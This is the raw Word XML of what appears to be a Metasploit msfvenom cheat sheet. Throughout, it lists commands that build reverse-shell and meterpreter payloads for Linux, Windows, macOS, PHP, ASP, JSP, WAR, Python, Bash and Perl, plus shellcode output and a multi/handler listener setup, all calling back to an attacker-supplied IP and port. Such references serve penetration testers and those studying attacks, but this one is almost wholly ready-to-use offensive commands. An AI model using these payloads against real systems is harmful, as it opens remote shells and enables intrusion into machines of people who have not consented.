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2F122" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="0048372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53D9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List payloads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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00483729" w:rsidRPr="00C53D9B" w14:paraId="257FDD7E" w14:textId="77777777" w:rsidTr="00396A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E962CB" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3560E9CA" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="0048372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53D9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Binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5BB01" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Linux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483729" w:rsidRPr="00C53D9B" w14:paraId="395BD214" w14:textId="77777777" w:rsidTr="00396A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14004A" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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linux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/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x86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/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meterpreter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/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reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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elf 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shell.elf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12970FC7" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Windows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483729" w:rsidRPr="00C53D9B" w14:paraId="18985449" w14:textId="77777777" w:rsidTr="00396A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44F5D9" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00483729" w:rsidRDefault="00483729" w:rsidP="00396A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b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msfvenom -p windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>reverse_tcp LHOST=</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Your IP Address</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LPORT=</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Your Port to Connect On</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -f exe </w:t>
            </w:r>
            <w:r w:rsidRPr="00483729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</w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00483729">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> shell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26E62ED1" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Mac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483729" w:rsidRPr="00C53D9B" w14:paraId="5159DB23" w14:textId="77777777" w:rsidTr="00396A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9EC78A" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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osx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/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x86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/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shell_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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macho 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shell.macho</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F38BE07" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="0048372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53D9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Web Payloads </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF1D76" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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PHP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483729" w:rsidRPr="00C53D9B" w14:paraId="72C8721B" w14:textId="77777777" w:rsidTr="00396A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7A08B8" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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php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/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meterpreter_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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raw 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shell.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34AD2DF2" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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3D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C20CB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cat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shell.php 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|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pbcopy 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&amp;&amp;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7A0874"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>echo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'&lt;?php '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|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C20CB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tr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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-d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'\n'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shell.php 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&amp;&amp;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pbpaste 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shell.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ECE63CF" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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ASP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483729" w:rsidRPr="00C53D9B" w14:paraId="5175E8CC" w14:textId="77777777" w:rsidTr="00396A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D7A231" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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windows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/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meterpreter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/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reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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asp 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shell.asp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3370C063" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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JSP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483729" w:rsidRPr="00C53D9B" w14:paraId="7121E784" w14:textId="77777777" w:rsidTr="00396A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916D7C" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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java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/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jsp_shell_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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raw 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shell.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CBB9902" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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WAR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483729" w:rsidRPr="00C53D9B" w14:paraId="3558232E" w14:textId="77777777" w:rsidTr="00396A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E9A47E" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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java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/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jsp_shell_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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war 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shell.war</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="114A7867" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="0048372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53D9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scripting Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F9AEFA" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9B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Python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483729" w:rsidRPr="00C53D9B" w14:paraId="55029722" w14:textId="77777777" w:rsidTr="00396A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BAA96D" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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cmd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/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unix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/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reverse_python </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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raw 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shell.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F6CD9B4" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Bash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483729" w:rsidRPr="00C53D9B" w14:paraId="123CE917" w14:textId="77777777" w:rsidTr="00396A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E8ACDF" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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cmd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/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unix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/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reverse_bash </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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raw 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shell.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45C6D76B" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Perl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483729" w:rsidRPr="00C53D9B" w14:paraId="3EC98CBE" w14:textId="77777777" w:rsidTr="00396A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430952" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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cmd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/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unix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/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reverse_perl </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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raw 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shell.pl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55293BE6" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="0048372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53D9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBCF75" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56827A5E" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Linux Based Shellcode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483729" w:rsidRPr="00C53D9B" w14:paraId="3C40DE54" w14:textId="77777777" w:rsidTr="00396A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9D5132" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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linux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/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x86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/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meterpreter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/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reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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&lt;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language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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F9E1D53" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Windows Based Shellcode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483729" w:rsidRPr="00C53D9B" w14:paraId="63EEC127" w14:textId="77777777" w:rsidTr="00396A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D7C6B5" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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windows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/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meterpreter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/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reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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&lt;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language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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5974E63C" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9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Mac Based Shellcode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483729" w:rsidRPr="00C53D9B" w14:paraId="5521C98C" w14:textId="77777777" w:rsidTr="00396A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B1694E" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-p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osx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/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x86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/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shell_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST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=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&lt;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Your IP Address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color w:val="007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT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=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&lt;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Your Port to Connect On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color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-f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&lt;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language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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C3DF593" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="0048372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53D9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Handlers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002C997" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="004837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3D9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.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483729" w:rsidRPr="00C53D9B" w14:paraId="07E28E61" w14:textId="77777777" w:rsidTr="00396A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FC80BE" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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use exploit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/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multi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/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handler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E3DF88" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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set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PAYLOAD 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&lt;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Payload name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</w:p>
          <w:p w14:paraId="7B030419" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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set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LHOST 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&lt;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LHOST value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</w:p>
          <w:p w14:paraId="3DC12CEB" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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set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LPORT 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&lt;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>LPORT value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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E50B43" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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53D9B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set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ExitOnSession </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C20CB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BEDE5A8" w14:textId="77777777" w:rsidR="00483729" w:rsidRDefault="00483729" w:rsidP="00396A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660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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exploit </w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-j</w:t>
            </w:r>
            <w:r w:rsidRPr="00C53D9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C53D9B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-z</w:t>
            </w:r>
